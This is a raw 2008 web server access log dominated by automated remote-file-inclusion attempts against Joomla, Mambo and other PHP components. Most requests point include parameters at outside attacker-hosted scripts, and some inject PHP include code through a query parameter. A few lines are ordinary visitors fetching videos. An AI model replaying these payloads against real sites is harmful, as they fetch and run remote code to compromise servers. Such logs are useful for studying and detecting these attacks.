140.113.4.81 - - [02/May/2008:11:07:42 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:07:42 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.18.76 - - [02/May/2008:11:08:01 -0700] "GET /logs/sub.php?menu=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:08:03 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [02/May/2008:11:08:06 -0700] "GET /logs/sub.php?menu=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [02/May/2008:11:08:12 -0700] "GET /sub.php?menu=ftp://84.32.137.157/incoming/upload/trex/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [02/May/2008:11:08:17 -0700] "GET /sub.php?menu=ftp://84.32.137.157/incoming/upload/trex/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:11:08:19 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.122.1.59 - - [02/May/2008:11:08:20 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:11:08:34 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:11:08:34 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.53.197.2 - - [02/May/2008:11:08:39 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:08:41 -0700] "GET /logs/access_080201.log/index1.php?pagina=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:08:44 -0700] "GET /index1.php?pagina=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:09:00 -0700] "GET /logs/index1.php?pagina=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:09:22 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:09:22 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.192.189.213 - - [02/May/2008:11:09:34 -0700] "GET /funny/?M=D HTTP/1.1" 200 808 "http://www.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=&aqp=index+of%2Ffunny&aqo=&aqn=&kgs=1&kls=0&dt=tmperiod&d2=7&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=1980&dto%5Bd%5D=2&dto%5Bm%5D=5&dto%5By%5D=2008&filetype=&rc=dmn&swd=&lh=&nbq=10" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
63.192.189.213 - - [02/May/2008:11:09:40 -0700] "GET /funny/terryt1.wmv HTTP/1.1" 200 196608 "http://www.dmulk.com/funny/?M=D" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:10:00 -0700] "GET /logs/access.log/index2.php?x=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:10:05 -0700] "GET /index2.php?x=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:10:06 -0700] "GET /logs/index2.php?x=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:10:24 -0700] "GET /logs/access_080215.log/index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:10:24 -0700] "GET /index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:10:25 -0700] "GET /logs/index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:10:28 -0700] "GET /logs/access_080215.log/index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.192.189.213 - - [02/May/2008:11:10:28 -0700] "GET /funny/terryt1.wmv HTTP/1.1" 200 4065346 "-" "NSPlayer/9.0.0.3250 WMFSDK/9.0" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:10:28 -0700] "GET /index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:10:28 -0700] "GET /logs/index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:10:32 -0700] "GET /logs/access_080220.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:10:37 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:10:37 -0700] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:10:38 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:10:38 -0700] "GET /logs/access_080215.log/index.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:10:42 -0700] "GET /index.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:10:42 -0700] "GET /logs/index.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:10:44 -0700] "GET /logs/access_080218.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:10:50 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:10:51 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:10:51 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:11:02 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:11:02 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:11:03 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.192.189.213 - - [02/May/2008:11:11:08 -0700] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 196608 "http://www.dmulk.com/funny/?M=D" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
63.192.189.213 - - [02/May/2008:11:11:09 -0700] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 196608 "-" "Windows-Media-Player/9.00.00.3250" "www.dmulk.com"
63.192.189.213 - - [02/May/2008:11:11:14 -0700] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 817843 "-" "NSPlayer/9.0.0.3250 WMFSDK/9.0" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:11:16 -0700] "GET /logs/access_080124.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:11:23 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:11:11:23 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:11:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:11:11:30 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:11:45 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:11:11:45 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:11:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:12:05 -0700] "GET //skin/zero_vote/error.php?dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:12:25 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.87.179.130 - - [02/May/2008:11:12:25 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:12:26 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.87.179.130 - - [02/May/2008:11:12:26 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:12:27 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:12:46 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:13:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:13:13 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:13:13 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.19.51.194 - - [02/May/2008:11:13:18 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [02/May/2008:11:13:18 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [02/May/2008:11:13:18 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:13:26 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:14:23 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:11:15:07 -0700] "GET /logs/access_080120.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:15:19 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:15:23 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:15:24 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:15:34 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:15:43 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.137.18 - - [02/May/2008:11:15:43 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [02/May/2008:11:15:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:15:48 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:15:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:15:50 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:15:55 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:16:07 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:16:10 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:16:11 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:16:11 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:16:13 -0700] "GET /logs/access_080227.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:16:21 -0700] "GET /logs/index1.php?site=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:16:21 -0700] "GET /index1.php?site=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:16:23 -0700] "GET /logs/access_071216.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.137.18 - - [02/May/2008:11:16:27 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:16:30 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:16:34 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:11:16:35 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:16:47 -0700] "GET /logs/index2.php?x=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:16:47 -0700] "GET /index2.php?x=http://vincent.panhard.free.fr/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:16:48 -0700] "GET /logs/index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.251.134 - - [02/May/2008:11:16:49 -0700] "GET /index1.php?site=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:11:16:50 -0700] "GET /contenido.php?sec=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:17:10 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.202.24 - - [02/May/2008:11:17:12 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.24 - - [02/May/2008:11:17:12 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.24 - - [02/May/2008:11:17:12 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:11:17:13 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:17:25 -0700] "GET /logs/access_080201.log/index.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:17:30 -0700] "GET /index.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:11:17:30 -0700] "GET /logs/index.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:11:17:36 -0700] "GET /logs/access_080215.log//modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [02/May/2008:11:18:28 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [02/May/2008:11:18:29 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [02/May/2008:11:18:29 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:18:45 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:18:46 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:11:18:51 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:11:19:13 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:11:19:13 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [02/May/2008:11:19:13 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://fadhilla.net/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.22.150.131 - - [02/May/2008:11:19:38 -0700] "GET /logs/str.php?p=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
